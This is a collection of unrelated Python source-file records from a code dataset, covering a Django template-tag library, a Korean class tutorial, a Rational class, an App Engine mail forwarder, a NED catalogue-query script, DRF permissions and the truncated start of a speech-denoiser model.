self.blocks.append(block_definition)\n if 'parser_class' in kwargs:\n self.parser_class = kwargs['parser_class']\n else:\n self.parser_class = Parser\n\n def get_parser_class(self):\n return self.parser_class\n\n def bootstrap(self):\n \"\"\"\n Bootstrap this options\n \"\"\"\n return StructuredOptions(self.options, self.breakpoints, self.blocks, self.combined_breakpoints)\n\n def parse(self, parser, tokens):\n \"\"\"\n Parse template tokens into a dictionary\n \"\"\"\n argument_parser_class = self.get_parser_class()\n argument_parser = argument_parser_class(self)\n return argument_parser.parse(parser, tokens)\n\n\nclass TagMeta(type):\n \"\"\"\n Metaclass for the Tag class that set's the name attribute onto the class\n and a _decorated_function pseudo-function which is used by Django's\n template system to get the tag name.\n \"\"\"\n def __new__(cls, name, bases, attrs):\n parents = [base for base in bases if isinstance(base, TagMeta)]\n if not parents:\n return super(TagMeta, cls).__new__(cls, name, bases, attrs)\n tag_name = attrs.get('name', get_default_name(name))\n\n def fake_func():\n pass # pragma: no cover\n\n fake_func.__name__ = tag_name\n attrs['_decorated_function'] = fake_func\n attrs['name'] = tag_name\n return super(TagMeta, cls).__new__(cls, name, bases, attrs)\n\n\nclass Tag(TagMeta('TagMeta', (Node,), {})):\n \"\"\"\n Main Tag class.\n \"\"\"\n options = Options()\n\n def __init__(self, parser, tokens):\n self.kwargs, self.blocks = self.options.parse(parser, tokens)\n self.child_nodelists = []\n for key, value in self.blocks.items():\n setattr(self, key, value)\n self.child_nodelists.append(key)\n\n def render(self, context):\n \"\"\"\n INTERNAL method to prepare rendering\n Usually you should not override this method, but rather use render_tag.\n \"\"\"\n items = self.kwargs.items()\n kwargs = dict([(key, value.resolve(context)) for key, value in items])\n kwargs.update(self.blocks)\n return self.render_tag(context, **kwargs)\n\n def render_tag(self, context, **kwargs):\n \"\"\"\n The method you should override in your custom tags\n \"\"\"\n raise NotImplementedError\n\n def __repr__(self):\n return '' % 
self.name\n","sub_path":"classytags/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
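For context, this Options/Tag machinery is typically used from a template library module like the following sketch (it mirrors the classytags README-style example; the Hello tag itself is illustrative):

from django import template
from classytags.arguments import Argument
from classytags.core import Options, Tag

register = template.Library()

class Hello(Tag):
    # {% hello "world" %} renders "hello world"
    options = Options(Argument('name'))

    def render_tag(self, context, name):
        return 'hello %s' % name

register.tag(Hello)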
+{"seq_id":"566754223","text":"# class\n\"\"\"\n- 새로운 이름 공간을 지원하는 단위 : 데이터의 설계도\n- 새로운 클래스는 새로운 자료형을 정의하는 것\n- 인스턴스는 이 자료형의 객체를 생성하는 것\n- 클래스와 인스턴트는 직접적인 연관관계를 갖는다\n\n- 인스턴스에서 클래스 멤버의 접근은 가능\n- 클래스 멤버에서 인스턴스 멤버의 접근은 불가\n\"\"\"\n\nclass MyString(str): #str을 상속받은 새로운 클래스\n pass\n\n# 특정 클래스를 상속받지 않을 경우, object 상속\ns = MyString() # 생성자 호출\nprint(type(s))\n\n# 어떤 클래스를 상속 받은 클래스인가?\n# __bases__ -> 부모의 목록을 튜플로 반환\nprint(\"MyString의 부모:\", MyString.__bases__)\n\n# 특정 부모를 상속받지 않을 경우 () 는 없어도 된다\nclass myobj: # 기본적으로 object를 상속\n pass\n\nprint(myobj.__bases__)\n\n# 파이썬은 여러 부모로부터의 상속을 허용한다\nclass Complex(str, myobj):\n # str로부터 모든 멤버들,\n # myobj로부터 모든 멤버들을 물려받는다\n pass\n\nprint(\"Complex의 부모:\", complex.__bases__)\n\n# 특정 클래스가 다른 클래스의 자식인지 확인\n# issubclass 함수\nprint(\"Complex가 str의 자식인가?\", issubclass(Complex, str))\n\n# 클래스의 생성\n# 인스턴스를 위한 멤버는 항상 self를 붙여준다\nclass Point:\n # 클래스 멤버:\n # 클래스 이름 공간 내에 생성\n # 모든 인스턴스 멤버 공유\n # 클래스 멤버는 인스턴스 생성 없이도 사용할 수 있다\n instance_count = 0\n\n def __init__(self, x=0, y=0): # 생성자\n # 파이썬은 여러 개의 생성자를 만들 수 없으므로\n # 범용적으로 사용될 수 있는 유일한 생성자를 작성\n self.x = x\n self.y = y\n Point.instance_count += 1\n\n def __del__(self): # 소멸자\n # 객체가 제거될 때 호출\n Point.instance_count -= 1\n def __str__(self): # 문자열 출력\n # str() 호출 혹은 print를 할때 사용되는\n # 비공식 문자열( 일반 사용자 대신\n return \"Point x={}, y={}\".format(\n self.x, self.y\n )\n\n def __repr__(self): # 문자열 출력\n # 개발자용, 공식문자열\n # repr() 함수로 전달받을 수 있다\n # 이 문자열로 해당 객체를 복원해 낼 수 있어야 한다\n return \"Point({}, {})\".format(\n self.x, self.y\n )\n\n def setX(self, x):\n self.x = x\n\n def setY(self, y):\n self.y = y\n\n def getX(self):\n return self.x\n\n def getY(self):\n return self.y\n\n# 연산자 오버로딩\n# 새로운 데이터 타입에 필요한 연산자의 행동을 재정의하는 것\n# 산술 연산자 오버로딩 예제\n def __add__(self, other):\n # Point(self) + other\n # other 타입을 점검 각기 다른 행동을 취하도록\n if isinstance(other, Point):\n # 합산된 객체가 point\n self.x += other.x\n self.y += other.y\n elif isinstance(other, int):\n self.x += other\n self.y += other\n else:\n self += other\n\n return self\n\n # 역이항 연산자 : other + point\n def __radd__(self, other):\n if isinstance(other, str):\n return other +str(self)\n elif isinstance(other, int):\n self.x += other\n self.y += other\n else:\n self + other\n return self\n\n\n\ndef bound_class_method():\n # 생성된 인스턴스를 통해 직접 매서드에 접근하는 방법\n p = Point()\n # bound 방식의 경우, 첫 번째 인자 self는 전달하지 않아도 된다\n p.setX(10)\n p.setY(20)\n\n print(\"Point p: {}, {}\".format(p.getX(), p.getY()))\n print(p.getX, p.getY())\n\n# bound_class_method()\n\ndef unbound_class_method():\n # 클래스를 통해 우회 접근하는 경우\n # 메서드에 부여된 self 인자에 실제 객체의 주소 전달\n p = Point()\n Point.setX(p, 10)\n Point.setY(p, 20)\n\n print(\"Point p: {}, {}\".format(Point.getX(p),Point.getY(p)))\n print(Point.getX, Point.getY)\n\n# unbound_class_method()\n\ndef class_member():\n p1 = Point()\n p2 = Point()\n\n # 클래스 멤버는 모든 인스턴스에서 접근 가능\n # 생성 없이도 직접 접근가능\n\n print(\"p1의 instance_count의 주소:\", id(p1.instance_count))\n print(\"p2의 instance_count의 주소:\", id(p2.instance_count))\n # 클래스 멤버의 변경\n # 공유 메모리 영역으로 활용할 수 있다\n Point.instance_count += 1\n print(\"p2의 instance_count:\", p2.instance_count)\n\n# class_member()\n\ndef lifecycle():\n # 생성자와 소멸자 테스트\n p1 = Point() # 생성자의 기본값이 사용\n print(p1)\n print(\"instance_count:\", Point.instance_count)\n\n p2 = Point(x=20, y=30)\n print(\"instance_count:\", Point.instance_count)\n\n del p2\n print(\"instance_count:\", Point.instance_count)\n\n# lifecycle()\n\ndef str_repr():\n p = Point(10,20)\n print(p) # __str__ 호출\n\n print(\"포인트 p=\"+str(p)) #__str__\n\n # repr 함수를 사용하면 __reor__ 문자열을 얻을 수 있다\n 
print(\"repr of p:\", repr(p))\n\n #eval 함수를 사용하면 파이썬 코드를 테스트할 수 있다\n # 이떄 repr 로 전달받은 문자열(개발자용)을 넘겨주면\n #같은 객체가 복원되어야 한다\n p_repr = eval(repr(p))\n print(p_repr, type(p_repr))\n\n# str_repr()\n\ndef test_overloading():\n # 연산자 오버로딩\n p = Point(10, 20)\n print(\"p:\", p)\n p2 = Point(30, 40)\n\n print(\"산술연산자 테스트:\", p + p2)\n print(\"Point + int:\", p + 20)\n\n print(\"int + point:\", 20 + p)\n # int 입장에서 Point와의 + 불가\n # Point 입장에서 int 합산을 재정의 : 역이항\n print(\"포인트 p = \" + p)\n\ntest_overloading()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"bitpy_adv/adv_class.py","file_name":"adv_class.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"143989970","text":"#! /usr/bin/env python3.7\n\n\"\"\"A class representing rational numbers.\n\nA rational number is a number that can be expressed as the ratio of two\ninteger values. That is,\n\n A rational number is a number that can be in the form p/q\n where p and q are integers and q is not equal to zero.\n\"\"\"\n\n\n# pylint: disable=invalid-name\n\n\ndef gcd(bigger, smaller):\n \"\"\"Calculate the greatest common divisor of two positive integers.\"\"\"\n if not bigger > smaller: # swap if necessary so bigger > smaller\n bigger, smaller = smaller, bigger\n\n while smaller != 0:\n remainder = bigger % smaller\n bigger, smaller = smaller, remainder\n\n return bigger\n\n\ndef lcm(a, b):\n \"\"\"Calculate the lowest common multiple of two positive integers.\"\"\"\n return (a * b) // gcd(a, b)\n\n\nclass Rational:\n \"\"\"Rational with numerator and denominator. Denominator parameter defaults to 1.\"\"\"\n\n def __init__(self, numerator, denominator=1):\n \"\"\"Initialize an instance of Rational.\"\"\"\n self.__numerator = numerator\n self.__denominator = denominator\n\n @property\n def numerator(self):\n \"\"\"Get the value of the numerator.\"\"\"\n return self.__numerator\n\n @property\n def denominator(self):\n \"\"\"Get the value of the denominator.\"\"\"\n return self.__denominator\n\n def __str__(self):\n \"\"\"Compute string representation for printing.\"\"\"\n return f\"{self.__numerator}/{self.__denominator}\"\n\n def __repr__(self):\n \"\"\"Use in the interpreter. Call __str__ for now.\"\"\"\n return self.__str__()\n\n def __add__(self, other):\n \"\"\"Add two Rationals.\"\"\"\n if isinstance(other, int):\n other = Rational(other)\n\n if isinstance(other, Rational):\n # find a common denominator (lcm)\n lcm_ = lcm(self.denominator, other.denominator)\n # multiply each by the lcm, then add\n numerator_sum = (lcm_ * self.numerator / self.denominator) + (\n lcm_ * other.numerator / other.denominator\n )\n else:\n pass\n # will most likely result in an exception being thrown\n return Rational(int(numerator_sum), lcm_)\n\n def __sub__(self, other):\n \"\"\"Subtract two Rationals.\"\"\"\n if isinstance(other, int):\n other = Rational(other)\n\n if isinstance(other, Rational):\n # subtraction is the same but with '-' instead of '+'\n lcm_ = lcm(self.denominator, other.denominator)\n numerator_diff = (lcm_ * self.numerator / self.denominator) - (\n lcm_ * other.numerator / other.denominator\n )\n else:\n pass\n # will most likely result in an exception being thrown\n return Rational(int(numerator_diff), lcm_)\n\n def reduce_rational(self):\n \"\"\"Return the reduced fractional value as a Rational.\"\"\"\n gdc_ = gcd(self.numerator, self.denominator)\n return Rational(self.numerator // gdc_, self.denominator // gdc_)\n\n def __eq__(self, other):\n \"\"\"Compare two Rationals for equality, return Boolean.\"\"\"\n if isinstance(other, int):\n other = Rational(other)\n\n if isinstance(other, Rational):\n # reduce both; then check that numerators and denominators are equal\n reduced_self = self.reduce_rational()\n reduced_other = other.reduce_rational()\n return (\n reduced_self.numerator == reduced_other.numerator\n and reduced_self.denominator == reduced_other.denominator\n )\n else:\n pass\n # will most likely result in an exception being thrown\n\n\nif __name__ == \"__main__\":\n a = Rational(1, 5)\n b = Rational(3, 5)\n print(f\"{a} + {b} = {a + b}\")\n\n c = Rational(1, 5)\n d = 1\n print(f\"{c} + {d} = {c + d}\")\n\n e = Rational(3, 3)\n f = 1\n print(f\"{e} == {f} is {e 
== f}\")\n\n g = 1\n h = Rational(3, 3)\n print(f\"{g} == {h} is {g == h}\")\n\n c = 1\n d = Rational(1, 5)\n print(f\"{c} + {d} = {c + d}\")\n","sub_path":"more_on_classes/rational_v4.py","file_name":"rational_v4.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
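A worked instance of the lcm-based addition and the reduce/compare path in rational_v4.py (the specific values are mine): 1/6 + 1/4 uses lcm(6, 4) = 12, giving numerators 2 + 3 = 5, i.e. 5/12.

assert gcd(12, 8) == 4
assert lcm(6, 4) == 12
assert (Rational(1, 6) + Rational(1, 4)) == Rational(5, 12)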
+{"seq_id":"84899441","text":"import re\nimport logging\n\ntry:\n from google.appengine.api import mail\nexcept ImportError:\n import sys\n sys.path.append(\"/usr/local/google_appengine\")\n sys.path.append(\"/usr/local/google_appengine/lib/yaml/lib\")\n from google.appengine.api import mail\n\n\ndef do_markdown( msg):\n \"\"\"docstring for do_markdown\"\"\"\n from markdown2 import Markdown\n markdowner = Markdown()\n msg.html = markdowner.convert(msg.body)\n return msg\n\nclass mail_processor(object):\n \"\"\"docstring for MailProcessor\"\"\"\n address_book = {\n 'post' : 'post@posterous.com',\n }\n email_aliases = {}\n filters = {\n 'm' : ('Markdown', do_markdown),\n }\n\n default_filters = ['m']\n\n def __init__(self):\n super(mail_processor, self).__init__()\n\n def process(self, incoming_message):\n \"\"\"docstring for process\"\"\"\n \n bodies = incoming_message.bodies(content_type='text/plain')\n allBodies = \"\"; \n for body in bodies:\n allBodies = allBodies + \"\\n\\n\" + body[1].decode()\n \n outgoing_message = mail.EmailMessage(\n to = self.to_maker(incoming_message),\n sender = self.sender_maker(incoming_message.sender),\n subject = incoming_message.subject,\n body = allBodies,\n )\n \n (filters_to_apply, outgoing_message) = self.filter_chooser(outgoing_message)\n for (name, f) in filters_to_apply:\n logging.info('Applying %s' % (name))\n outgoing_message = f(outgoing_message)\n return outgoing_message\n\n @staticmethod\n def clean_email_address(address):\n \"\"\"docstring for clean_email_address\"\"\"\n add_re = re.compile(r'.*<(.+@.*\\..+)>')\n m = add_re.search(address)\n if m:\n address = m.group(1)\n else:\n address = address.split('<')[-1].strip('>')\n return address.lower()\n\n def to_maker(self, msg):\n \"\"\"docstring for to_maker\"\"\"\n if isinstance(msg.to, list):\n address = msg.to[0]\n else:\n address = msg.to\n \n address = self.clean_email_address(address)\n address = address.split('@')[0]\n if address == 'test':\n return msg.sender\n \n if address in self.address_book:\n return self.address_book[address]\n \n return address.replace('$', '@')\n \n def sender_maker(self, em):\n \"\"\"docstring for sender_maker\"\"\"\n s = self.clean_email_address(em)\n s = self.email_aliases.get(s, s)\n logging.info('Sender = %s' % (s))\n return s\n\n\n\n def filter_chooser(self, msg):\n \"\"\"docstring for filter_chooser\"\"\"\n # Subject ends with [m,jk,foo,e] string that specifies filters to apply\n filter_subject = re.compile(r'\\s*\\[([a-z]{1,3},?)+\\]$')\n filters_to_apply = filter_subject.findall(msg.subject)\n if not filters_to_apply:\n filters_to_apply = self.default_filters\n else:\n msg.subject = filter_subject.sub('', msg.subject)\n return ([self.filters[f] for f in filters_to_apply], msg)\n ","sub_path":"mail_processor.py","file_name":"mail_processor.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"273095547","text":"#!/usr/bin/env python\n'''\nget the NED name for the cleaned sample by querying NED\n\nINPUT: vf_clean_sample.fits\n\nOUTPUT: vf_clean_sample_wNEDname.fits\n\nPROCEDURE:\n- first try to use the file /home/rfinn/research/Virgo/supersample/ned_names.fits\n- look up each object according to its vf_clean_sample.superName \n - check this against the ned_names.NEDinput\n - ned_names.NEDname is the corresponding ned name\n\n'''\n\nimport os\nimport numpy as np\nimport time\n\nfrom astropy.io import fits, ascii\nfrom astropy.table import Table, join, hstack, vstack, Column, MaskedColumn \nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\n\nfrom astroquery.ned import Ned\n\nfrom matplotlib import pyplot as plt\n\nfrom virgoCommon import *\n\n\nimport argparse\nparser = argparse.ArgumentParser(description ='Create a crazy big catalog from HL, AGC, NSA')\nparser.add_argument('--version',dest = 'version', default='v1',help='version of tables. default is v1')\nparser.add_argument('--evcc',dest = 'evcc', default=False,action='store_true',help='run for evcc catalog containing galaxies not in our original table')\n \nargs = parser.parse_args()\n\nif args.evcc:\n outfile_suffix = '_'+args.version+'_evcc'\nelse:\n outfile_suffix = '_'+args.version\n\n\nclass getNED:\n def __init__(self,clean_catalog):\n self.cat = Table(fits.getdata(clean_catalog))\n def get_NEDname(self):\n\n # skip for now until other parts are working\n # if file with NED names already exists from a previous query,\n # read the file\n\n self.nedfile = 'ned_names'+outfile_suffix+'.fits'\n if os.path.exists(self.nedfile):\n print('found file '+self.nedfile+'\\nUsing this instead of querying NED')\n self.get_NEDname_from_file()\n self.write_clean() \n else:\n #sys.exit() # for testing purposes\n print('querying NED names from database')\n self.get_NEDname_query()\n def get_NEDname_from_file(self):\n \n nednames = Table(fits.getdata(self.nedfile))\n self.nednames = nednames\n # do a left join of the input catalog and nednames\n # using column nednames.NEDinput and cat.superName\n\n #self.cat.rename_column('superName','NEDinput')\n self.cat.add_column(self.cat['superName'],name='NEDinput')\n\n # join returns a table that is sorted by the key columns\n # the following command gets table back into its original order\n self.newtab = myjoinleft(self.cat,nednames,keys='NEDinput')\n\n \n # fix case for UGC09348, until we run the full query again...\n # this is where HL has the wrong coordinates/association\n flag = self.newtab['NEDinput'] == 'UGC09348'\n if (sum(flag) > 0) & self.newtab['NEDra'].mask[flag]: # hasn't been matched\n # assign ned RA and DEc from NGC 5658\n flag2 = nednames['NEDname']=='NGC 5658'\n if sum(flag2) > 0:\n self.newtab['NEDra'][flag] = nednames['NEDra'][flag2]\n self.newtab['NEDdec'][flag] = nednames['NEDdec'][flag2]\n self.newtab['NEDname'][flag] = 'UGC 09348'\n else:\n print('ruh roh')\n # fix case for PGC2586382 , until we run the full query again...\n # NED doesn't recognize 'PGC2586382', but it does know LEDA 2586382\n # it will also find the NSA ID, so I need to not just use the superName\n # I need to keep stepping through other name options if it doesn't return\n # a match to HL or AGC or NSA name\n flag = self.newtab['NEDinput']== 'PGC2586382'\n if (sum(flag) > 0) & self.newtab['NEDra'].mask[flag]: # hasn't been matched\n self.newtab['NEDra'][flag] = 226.398865 \n self.newtab['NEDdec'][flag] = 59.093766\n self.newtab['NEDname'][flag] = 'WISEA 
J150535.77+590537.2'\n\n # fix case for NGC 2793, until we run the full query again...\n # The NSA ID from version 1 doesn't get a NED match, but the\n # NSA ID from version 0 does...\n flag = self.newtab['NSAID_2']==135797\n if (sum(flag) > 0) & self.newtab['NEDra'].mask[flag]: # hasn't been matched\n self.newtab['NEDra'][flag] = 139.197125\n self.newtab['NEDdec'][flag] = 34.429806\n self.newtab['NEDname'][flag] = 'NGC 2793'\n \n\n # fix case for UGC 08, until we run the full query again...\n # The NSA ID from version 1 doesn't get a NED match, but the\n # NSA ID from version 0 does...\n flag = self.newtab['superName']=='UGC08656 NOTES01'\n if (sum(flag) > 0) & self.newtab['NEDra'].mask[flag]: # hasn't been matched\n self.newtab['NEDra'][flag] = 205.129878\n self.newtab['NEDdec'][flag] = 42.993819\n self.newtab['NEDname'][flag] = 'UGC 08656 NOTES01'\n \n \n # for those without a match by NEDname, look through the\n # entries with NEDinput = 'byposition'\n \n no_match_by_name = self.newtab['NEDname'].mask\n print(no_match_by_name)\n pos_match_indices = np.arange(len(self.cat))[no_match_by_name]\n\n # shorten NED catalog to those that were matched by location\n # this should make search by location faster\n self.nednames_bypos = nednames[nednames['NEDinput'] == 'bylocation']\n #nedcoord = SkyCoord(self.nednames_bypos['NEDra'],self.nednames_bypos['NEDdec'],unit='deg',frame='icrs') \n #self.catcoord = SkyCoord(self.cat['RA'],self.cat['DEC'],unit='deg',frame='icrs') \n for i in pos_match_indices:\n d = np.sqrt((self.newtab['RA'][i]-self.nednames_bypos['NEDra'])**2 + \\\n (self.newtab['DEC'][i]-self.nednames_bypos['NEDdec'])**2)\n if (min(d) < 10./3600):\n j = np.where(d == min(d))[0][0] \n #print(i,j,'found a match!')\n\n self.newtab['NEDinput'][i]='bylocation'\n self.newtab['NEDname'][i] = self.nednames_bypos['NEDname'][j]\n self.newtab['NEDra'][i] = self.nednames_bypos['NEDra'][j]\n self.newtab['NEDdec'][i] = self.nednames_bypos['NEDdec'][j]\n self.newtab.write('test.fits',format='fits',overwrite=True)\n \n # for those with no match, query NED\n \n def query_unmatched(self,startindex=0):\n ## running query for those that haven't yet been matched to an entry in the catalog\n ##\n\n no_match_by_name = self.cat['NEDname'].mask\n pos_match_indices = np.arange(len(self.cat))[no_match_by_name]\n \n \n for i in pos_match_indices:\n foundit=False\n \n time.sleep(.5)\n coord = SkyCoord(self.cat['RA'][i],self.cat['DEC'][i],unit=(u.deg,u.deg), frame='icrs')\n print(i,self.cat['RA'][i],self.cat['DEC'][i])\n \n try:\n t = Ned.query_region(coord,radius=10./3600*u.deg, equinox='J2000')\n print(t)\n #t = Ned.query_object('NSA '+str(self.cat['NSAID_2'][i]))\n self.cat['NEDname'][i] = t['Object Name'][0]\n self.cat['NEDra'][i] = t['RA'][0]\n self.cat['NEDdec'][i] = t['DEC'][0]\n self.cat['NEDinput'][i] = 'bylocation'\n foundit=True\n continue\n except IndexError:\n print('IndexError')\n pass\n except:\n print(i,'NED did not like search by coordinate for this object')\n\n if not(foundit):\n print(\"oh no - could not find NED name! 
so sorry...\",i)\n self.cat['NEDname'][i] = ''\n self.cat['NEDra'][i] = -999\n self.cat['NEDdec'][i] = -999\n \n\n def write_NEDnames(self):\n nedtable = Table([self.cat['NEDinput'],self.cat['NEDra'],self.cat['NEDdec'],self.cat['NEDname']])\n nedtable.write(self.nedfile,format='fits',overwrite=True) \n\n \n def get_NEDname_query(self,startindex=0):\n ## GOT BLOCKED BY NED FOR TOO MANY QUERIES\n ## TRYING ANOTHER APPROACH - TO MATCH TO CATALOG I DOWNLOADED FROM DEC\n \n # look up NED name for each galaxy\n # https://astroquery.readthedocs.io/en/latest/ned/ned.html\n\n\n # if in HL, look up HL name\n NEDid = []\n NEDra = []\n NEDdec = []\n NEDinput = []\n \n for i in range(startindex,len(self.cat['objname'])):\n #for i in range(20): \n # check if HL id exists, look up NED name\n # if yes, break\n #\n # if no NED comes back\n # check if NSA ID exists for that galaxy. if yes, look up NED name\n # if NED name is found, break\n #\n # if no NED name comes back\n # check if A100 ID exists for that galaxy. if yes, look up NED name\n # if no Ned name comes back, then no NED name!\n #\n foundit=False\n if self.cat['HLflag'][i]:\n time.sleep(.5)\n try:\n t = Ned.query_object(self.cat['objname'][i])\n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append(self.cat['objname'][i])\n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'2 NED did not like ',self.cat['objname'][i])\n pass\n \n\n if self.cat['NSAflag'][i]:\n if not(foundit):\n time.sleep(.5)\n try:\n t = Ned.query_object('NSA '+str(self.cat['NSAID'][i]))\n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append('NSA '+str(self.cat['NSAID'][i]))\n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'2 NED did not like ','NSA '+str(self.cat['NSAID'][i]))\n pass\n if self.cat['A100flag'][i]:\n if not(foundit):\n time.sleep(.5)\n try:\n #print('AGC'+str(self.cat['AGC'][i]))\n t = Ned.query_object('AGC'+str(self.cat['AGC'][i]))\n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append('AGC'+str(self.cat['AGC'][i]))\n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'2 NED did not like ','AGC'+str(self.cat['AGC'][i]))\n pass\n if self.cat['NSA0flag'][i]:\n if not(foundit):\n time.sleep(.5)\n try:\n t = Ned.query_object('NSA '+str(self.cat['NSAID_2'][i]))\n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append('NSA '+str(self.cat['NSAID_2'][i]))\n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'2 NED did not like ','NSA '+str(self.cat['NSAID'][i]))\n pass\n\n # check to make sure that the NED ra and dec\n # is not offset from object\n # we have a few cases where the NED object is wrong\n if foundit:\n distance = np.sqrt((self.cat['RA'][i]-NEDra[-1])**2 + \\\n (self.cat['DEC'][i] - NEDdec[-1])**2)\n if (distance > 10./3600):\n print('NED name is offset from source by {1:.3e} arcsec'.format(distance*3600))\n print('resetting foundit to false')\n foundit = False\n if not(foundit):\n # search by coordinates\n time.sleep(.5)\n coord = SkyCoord(self.cat['RA'][i],self.cat['DEC'][i],unit=(u.deg,u.deg), frame='icrs')\n print(i,self.cat['RA'][i],self.cat['DEC'][i])\n\n try:\n t = Ned.query_region(coord,radius=10./3600*u.deg, equinox='J2000')\n print(t)\n #t = Ned.query_object('NSA '+str(self.cat['NSAID_2'][i]))\n\n # should check if NED name already points to 
another galaxy\n # and remove it if it does\n if np.sum(np.array(NEDid) == t['Object Name'][0]) > 0:\n # galaxy is already in the list, so position match is wrong\n print('galaxy ', t['Object Name'][0],' is already in the list')\n else:\n \n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append('bylocation')\n\n \n \n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'NED did not like search by coordinate for this object')\n\n if not(foundit):\n print(\"oh no - could not find NED name! so sorry...\",i)\n NEDid.append('')\n NEDra.append(-999)\n NEDdec.append(-999)\n NEDinput.append(-999)\n else:\n print(i,'found NED name')\n\n # ANOTHER CHECK TO ADD\n # find any remaining duplicates\n # if only one has NEDinput == 'bylocation', \n # then remove the ned name for the duplicate that has 'bylocation'\n\n \n c1 = Column(NEDid,name='NEDname')\n c2 = Column(np.array(NEDra,'f8'),name='NEDra')\n c3 = Column(np.array(NEDdec,'f8'),name='NEDdec')\n c4 = Column(NEDinput,name='NEDinput') \n self.NEDid = NEDid\n self.NEDra = NEDra\n self.NEDdec = NEDdec\n try:\n #nedtable = Table([c1,c2,c3,c4]).write('ned_names.tbl',format='ipac',overwrite=True)\n\n self.nedtable = Table([c1,c2,c3,c4]).write('ned_names'+outfile_suffix+'.fits',format='fits',overwrite=True) \n except:\n print(\"couldn't write ned names\")\n \n self.cat.add_columns([c1,c2,c3,c4])\n self.cat.write('vf_clean_sample_wNEDname'+outfile_suffix+'.fits',format='fits',overwrite=True)\n def get_GL_NEDname(self):\n # for galaxies with no NED match, use GL's catalog to match\n # HL name to NEDname (he did a position match for those that didn't return a NED name\n # when searching by name\n ref = fits.getdata(homedir+'/github/Virgo/tables/nsa_HyperLeda_NED_Steer2017dist_Virgo_field_sources_extension_H0_74_0_final_Kim2016corr_inclCOsample.fits')\n\n \n\n def write_clean(self):\n #self.newtab.write('vf_clean_sample_wNEDname.fits',format='fits',overwrite=True)\n # updating for v1\n # this is where RA and DEC are converted to \n self.newtab.write('vf_clean_sample_wNEDname'+outfile_suffix+'.fits',format='fits',overwrite=True)\n\n\nif __name__ == '__main__':\n os.chdir('/home/rfinn/research/Virgo/supersample/')\n ###################################################################\n #### INPUT FILES\n ###################################################################\n #n = getNED('vf_clean_sample.fits') # for v0\n n = getNED('vf_clean_sample_v1.fits') # for v1 \n n.get_NEDname()\n #n.query_unmatched()\n #n.write_NEDnames()\n\n","sub_path":"programs/get_NEDname.py","file_name":"get_NEDname.py","file_ext":"py","file_size_in_byte":16259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
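The position matches above measure separation as sqrt(dRA^2 + dDec^2) in degrees, which overestimates east-west offsets away from the equator (the dRA term should carry a cos(Dec) factor). Astropy computes the true angular separation directly; a sketch with arbitrary coordinates:

from astropy.coordinates import SkyCoord
import astropy.units as u

c1 = SkyCoord(226.398865, 59.093766, unit="deg")
c2 = SkyCoord(226.403865, 59.093766, unit="deg")
# 0.005 deg of RA at Dec ~59 is only ~9.3 arcsec, though the flat formula says 18
within_10_arcsec = c1.separation(c2) < 10 * u.arcsec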
+{"seq_id":"472920961","text":"\nfrom rest_framework import permissions\nfrom .models import *\n#new\nclass IsNotActive(permissions.BasePermission):\n \"\"\"\n checking if user is already active or not.\n \"\"\"\n def has_permission(self, request, view):\n if request.user.is_active == True:\n return False\n return True\nclass IsOwnerOrReadOnly(permissions.BasePermission):\n \"\"\"Custom permission class which allow\n object owner to do all http methods\"\"\"\n\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n\n return obj.author.id == request.user.id\n\n\nclass IsOwnerOrPostOwnerOrReadOnly(permissions.BasePermission):\n \"\"\"Custom permission class which allow comment owner to do all http methods\n and Post Owner to DELETE comment\"\"\"\n\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n\n if request.method == 'DELETE' and \\\n obj.post.author.id == request.user.id:\n return True\n\n return obj.author.id == request.user.id","sub_path":"akggram/insta/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"392708416","text":"from tensorflow.keras.layers import Conv2D, Input, LeakyReLU, Flatten, Dense, Reshape, Conv2DTranspose, BatchNormalization, Activation\nfrom tensorflow.keras import Model, Sequential\n\nfrom SpeechDenoiserCNN.FeatureExtractor import FeatureExtractor\nimport sounddevice as sd\nimport tensorflow as tf\nimport numpy as np\nimport librosa\nimport pyaudio\nimport scipy\nimport socket\nimport struct\nimport audioop\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\nwindowLength = 256\noverlap = round(0.25 * windowLength) # overlap of 75%\nffTLength = windowLength\ninputFs = 48e3\nfs = 16e3\nnumFeatures = ffTLength//2 + 1\nnumSegments = 8\n\n\nclass SpeechDenoiser:\n \n def read_audio(self,filepath, sample_rate, normalize=True):\n audio, sr = librosa.load(filepath, sr=sample_rate)\n if normalize:\n div_fac = 1 / np.max(np.abs(audio)) / 3.0\n audio = audio * div_fac\n return audio, sr\n\n def build_model(self,l2_strength):\n inputs = Input(shape=[numFeatures,numSegments,1])\n x = inputs\n\n # -----\n x = 